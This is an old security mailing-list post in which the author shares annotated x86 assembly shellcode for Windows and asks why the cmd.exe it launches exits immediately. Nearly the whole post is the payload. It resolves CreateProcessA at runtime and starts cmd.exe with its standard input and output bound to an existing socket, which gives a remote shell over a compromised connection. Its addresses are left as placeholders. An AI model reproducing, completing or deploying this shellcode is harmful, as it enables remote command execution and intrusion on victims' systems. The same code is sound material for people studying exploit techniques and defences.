
Re: Windows reverse Shell


From: Berend-Jan Wever <skylined () edup tudelft nl>
Date: 5 Feb 2003 00:54:44 -0000

In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>

I wrote a little piece of shellcode that should spawn a shell using a 
socket in %ebp, which does execute cmd.exe successfully. The problem is 
that cmd.exe dies right away. Has anybody got an idea why? The source 
(asm for linux) is included.

Kind regards,

Berend-Jan Wever

    # MakeStringAndNegEbx
    #   Terminate the ','-delimited string at %edi in place and step %edi
    #   past it; additionally negate %ebx for the caller.
    # In:    %edi = start of a string that ends in ','
    #        %ebx = value to negate (callers load a negated immediate)
    # Out:   %edi = first byte after the ',' (start of the next string)
    #        the ',' byte is overwritten with 0 (NUL terminator)
    #        %ebx = -%ebx
    # Clobb: %al, %ecx, flags
    # Notes: `Start` and `MakeStringAndNegEbx` label the same address;
    #        `Start`/`End` presumably just bracket the listing, with
    #        execution beginning at `EntryPoint` (see below).
    #        repne scasb scans forward only while DF is clear; nothing in
    #        this listing touches DF, so it relies on the caller's state.
    Start:
    MakeStringAndNegEbx:
      mov     $',', %al         # %al = ',' = the delimiter scasb looks for
      xor     %ecx, %ecx
      dec     %ecx              # %ecx = -1: effectively unbounded scan
      repne   scasb             # search for ','; %edi ends one past it
      sub     %al, -1(%edi)     # ',' - ',' = 0: NUL-terminate in place
      neg     %ebx              # %ebx = -%ebx (undo the caller's negation)
      ret
    
    # GetLibraryAndProcAddress
    #   %eax = GetProcAddress(LoadLibraryA(libName), procName)
    # In:    %edi = "libName," immediately followed by "procName,"
    #        (each is NUL-terminated in place by MakeStringAndNegEbx)
    # Out:   %eax = resolved procedure address (whatever GetProcAddress
    #        returned; not checked here)
    #        %edi = first byte after procName's ','
    # Clobb: %ebx, %ecx, flags, plus whatever the two Win32 calls clobber
    # Notes: each -0xXXXXXX immediate is a placeholder for the negated
    #        address of a memory word that holds the function's address
    #        (presumably an import-table entry - not stated here);
    #        MakeStringAndNegEbx undoes the negation and `call *(%ebx)`
    #        calls through that word. As posted the listing does not
    #        assemble until the placeholders are filled in, and the
    #        hard-coded addresses tie it to one specific image layout.
    #        There is no caller-side stack cleanup after either call,
    #        consistent with the stdcall (callee-cleans) convention of
    #        these Win32 APIs.
    GetLibraryAndProcAddress: # {
      push    %edi              # > libName
      mov     $-0xXXXXXX, %ebx  # placeholder: -(address of LoadLibraryA slot)
      call    MakeStringAndNegEbx # put 0 after libName; %ebx = +address
      call    *(%ebx)           # < %eax = LoadLibraryA(libName);

      push    %edi              # > procName (%edi was advanced above)
      push    %eax              #  > libHandle (return value of LoadLibraryA)
      mov     $-0xXXXXXX, %ebx  # placeholder: -(address of GetProcAddress slot)
      call    MakeStringAndNegEbx # put 0 after procName; %ebx = +address
      call    *(%ebx)           # << %eax = GetProcAddress(libHandle, procName);
      ret
    # }

    # main1
    #   Build a STARTUPINFOA and a PROCESS_INFORMATION on the stack, resolve
    #   CreateProcessA by name, call it for "cmd.exe" with stdin/stdout/
    #   stderr all set to the socket handle, then spin forever.
    # In:    %ebp = socket handle
    #        top of stack = return address pushed by `call main1` in
    #        EntryPoint, i.e. the address of `End`, which is where the
    #        data "cmd.exe,kernel32.dll,CreateProcessA," follows the code
    # Out:   never returns (falls into InfinitLoop)
    # Clobb: %eax, %ebx, %ecx, %edi, %esi; %esp is left lowered by
    #        17 + 4 = 21 dwords (the two structs) and nothing is popped,
    #        which only works because this routine never returns.
    main1:
      # %ebp = socket
      pop     %edi              # < %edi = &strings (the popped return address)
      
      # create a struct StartupInfo on the stack (17 dwords = 0x44 bytes),
      # pushed last field first so that %esp ends up at its first field.
      xor     %eax, %eax
      push    %ebp              # HANDLE hStdError = socket
      push    %ebp              # HANDLE hStdOutput = socket
      push    %ebp              # HANDLE hStdInPut = socket
      push    %eax              # LPBYTE lpReserved2 = NULL
      inc     %eax              # WORD   cbReserved2 = 0 (high word of the dword below)
      push    %eax              # WORD   wShowWindow = 1 (low word)
      mov     %al, %ah          # %eax = 0x101
      push    %eax              # DWORD  dwFlags = STARTF_USESHOWWINDOW (0x1) |
      xor     %eax, %eax        #                  STARTF_USESTDHANDLES (0x100)
      push    %eax              # DWORD  dwFillAttribute = 0
      push    %eax              # DWORD  dwYCountChars = 0
      push    %eax              # DWORD  dwXCountChars = 0
      push    %eax              # DWORD  dwYSize = 0
      push    %eax              # DWORD  dwXSize = 0
      push    %eax              # DWORD  dwY = 0
      push    %eax              # DWORD  dwX = 0
      push    %eax              # LPTSTR lpTitle = NULL (program name)
      push    %eax              # LPTSTR lpDesktop = NULL (inherit)
      push    %eax              # LPTSTR lpReserved = NULL
      mov     $0x44, %al
      push    %eax              # DWORD  cb = 0x44 (sizeof STARTUPINFOA)
      mov     %esp, %esi        # %esi = &StartupInfo

      # create a struct ProcessInformation on the stack (4 zeroed dwords);
      # %esp afterwards = &ProcessInformation.
      xor     %eax, %eax
      push    %eax              # HANDLE hProcess;
      push    %eax              # HANDLE hThread;
      push    %eax              # DWORD dwProcessId;
      push    %eax              # DWORD dwThreadId;


      # create a process with STD I/O handles hooked to socket.
      # Ten arguments pushed right-to-left for CreateProcessA.
      push    %esp              # > lpProcessInformation -> stack (push uses the pre-push %esp)
      push    %esi              #  > lpStartupInfo -> stack
      push    %eax              #   > lpCurrentDirectory: NULL
      push    %eax              #    > lpEnvironment: NULL
      push    %eax              #     > dwCreationFlags: 0
      inc     %eax
      push    %eax              #      > bInheritHandles: 1 (true)
      dec     %eax
      push    %eax              #       > lpThreadAttributes: NULL
      push    %eax              #        > lpProcessAttributes: NULL
      push    %edi              #         > lpCommandLine: &('cmd.exe') (terminated just below)
      push    %eax              #          > lpApplicationName: NULL
      call    MakeStringAndNegEbx # put 0 after commandline; %edi -> "kernel32.dll,..."; %ebx negated (unused here)
      call    GetLibraryAndProcAddress # %eax = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateProcessA")
      call    *%eax             # <<<<<<<<<< CreateProcess(...); return value is not checked
      
    InfinitLoop:
      jmp     InfinitLoop       # wait forever; the stack and handles above are never released.

    # EntryPoint
    #   Where execution is meant to begin: read the socket handle from a
    #   stack slot at a placeholder offset and pass it to main1 in %ebp.
    # In:    socket handle stored at 0xXX(%esp) - 0xXX is a placeholder
    #        that depends on how the caller's frame is laid out when
    #        control arrives here (not determined by this listing)
    # Out:   does not return (main1 never returns)
    # Note:  `call main1` pushes the address of `End`, which main1 pops as
    #        the pointer to the string data that follows the code.
    EntryPoint:
      lea   0xXX(%esp), %eax    # socket is on the stack at XX (placeholder offset)
      mov   (%eax), %ebp        # %ebp = socket handle
      call  main1               # pushes &End = &strings; never returns
    End:

The code is followed by this string:
    "cmd.exe,kernel32.dll,CreateProcessA,"

